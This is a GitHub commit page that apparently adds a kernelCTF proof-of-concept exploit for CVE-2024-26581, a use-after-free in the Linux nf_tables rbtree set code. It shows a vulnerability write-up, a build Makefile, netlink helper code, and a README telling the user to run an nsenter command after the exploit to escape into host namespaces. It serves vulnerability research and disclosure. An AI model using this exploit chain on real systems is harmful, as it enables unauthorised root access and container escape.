-
Notifications
You must be signed in to change notification settings - Fork 417
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add kernelCTF CVE-2024-26581_lts_cos_mitigation (#109)
* Add CVE-2024-1085_lts * Change metadata.json * Change exploit.c * Change exploit.c * Change exploit.c * Change exploit.c * Fix bug * Fix bug * Add more details * Add CVE-2024-26581_lts_cos_mitigation * Fix metadata.json * Fix exploit * Fix exploit * Fix exploit * Add more details in exploit.md * Add more details in exploit.md * Add more details in exploit.md * Fix cos exploit.c * Fix cos exploit.c * Fix cos exploit.c * Delete pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/exploit * add more details in exploit.md * for stability test * for stability test * for stability test * for stability test * for stability test * for stability test * for stability test --------- Co-authored-by: lonial con <[email protected]>
- Loading branch information
1 parent
699139f
commit 7f0fd3f
Showing
30 changed files
with
4,357 additions
and
0 deletions.
There are no files selected for viewing
292 changes: 292 additions & 0 deletions
292
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/exploit.md
Large diffs are not rendered by default.
Oops, something went wrong.
48 changes: 48 additions & 0 deletions
48
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/vulnerability.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
# Vulneribility | ||
In function `nft_rbtree_gc_elem`, it lacks a check similar to this [commit](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=2ee52ae94baabf7ee09cf2a8d854b990dac5d0e4) for the setelement pointed to by `prev`. | ||
This is the existing check for looking for prev: | ||
```c | ||
while (prev) { | ||
rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node); | ||
if (nft_rbtree_interval_end(rbe_prev) && | ||
nft_set_elem_active(&rbe_prev->ext, genmask)) | ||
break; | ||
prev = rb_prev(prev); | ||
} | ||
``` | ||
and this is how it should be checked: | ||
```c | ||
u8 cur_genmask = nft_genmask_cur(net); | ||
while (prev) { | ||
rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node); | ||
if (nft_rbtree_interval_end(rbe_prev) && | ||
nft_set_elem_active( &rbe_prev->ext, genmask) && | ||
nft_set_elem_active(&rbe_prev->ext, cur_genmask)) | ||
break; | ||
prev = rb_prev(prev); | ||
} | ||
``` | ||
The lack of this check may result in use-after-free of the set element pointed to by prev. | ||
|
||
## Requirements to trigger the vulnerability | ||
- Capabilities: `CAP_NET_ADMIN` capability is required. | ||
- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` | ||
- Are user namespaces needed?: Yes | ||
|
||
## Commit which introduced the vulnerability | ||
- [commit c9e6978e2725a7d4b6cd23b2facd3f11422c0643](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=c9e6978e2725a7d4b6cd23b2facd3f11422c0643) | ||
|
||
## Commit which fixed the vulnerability | ||
- [commit 60c0c230c6f046da536d3df8b39a20b9a9fd6af0](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter?id=60c0c230c6f046da536d3df8b39a20b9a9fd6af0) | ||
|
||
## Affected kernel versions | ||
- 6.1.9 and later | ||
- 5.15.91 and later | ||
- 5.10.166 and later | ||
|
||
## Affected component, subsystem | ||
- net/netfilter (nf_tables) | ||
|
||
## Cause | ||
- UAF | ||
|
9 changes: 9 additions & 0 deletions
9
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/Makefile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
exploit: | ||
gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static | ||
prerequisites: | ||
sudo apt-get install libnl-nf-3-dev | ||
run: | ||
./exploit | ||
|
||
clean: | ||
rm exploit |
2 changes: 2 additions & 0 deletions
2
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/README
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
Exploit for kctf cos-105-17412.226.68 | ||
Run command "nsenter --target 1 -m -p" after run the poc. |
24 changes: 24 additions & 0 deletions
24
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/chain.h
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
extern int cur_handle; | ||
struct nlmsghdr * new_chain_msg(char *table_name, char *chain_name, int if_binding){ | ||
struct nl_msg * msg2 = nlmsg_alloc(); | ||
struct nlmsghdr *hdr2 = nlmsg_put( | ||
msg2, | ||
NL_AUTO_PORT, // auto assign current pid | ||
NL_AUTO_SEQ, // begin wit seq number 0 | ||
(NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE | ||
sizeof(struct nfgenmsg), | ||
NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO | ||
); | ||
struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); | ||
h2->nfgen_family = 2;//NFPROTO_IPV4; | ||
h2->version = 0; | ||
h2->res_id = NFNL_SUBSYS_NFTABLES; | ||
memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); | ||
nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); | ||
nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); | ||
if(if_binding>0){ | ||
nla_put_u32(msg2, NFTA_CHAIN_FLAGS, htonl(NFT_CHAIN_BINDING)); | ||
} | ||
cur_handle++; | ||
return hdr2; | ||
} |
Binary file added
BIN
+1.24 MB
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/exploit
Binary file not shown.
Oops, something went wrong.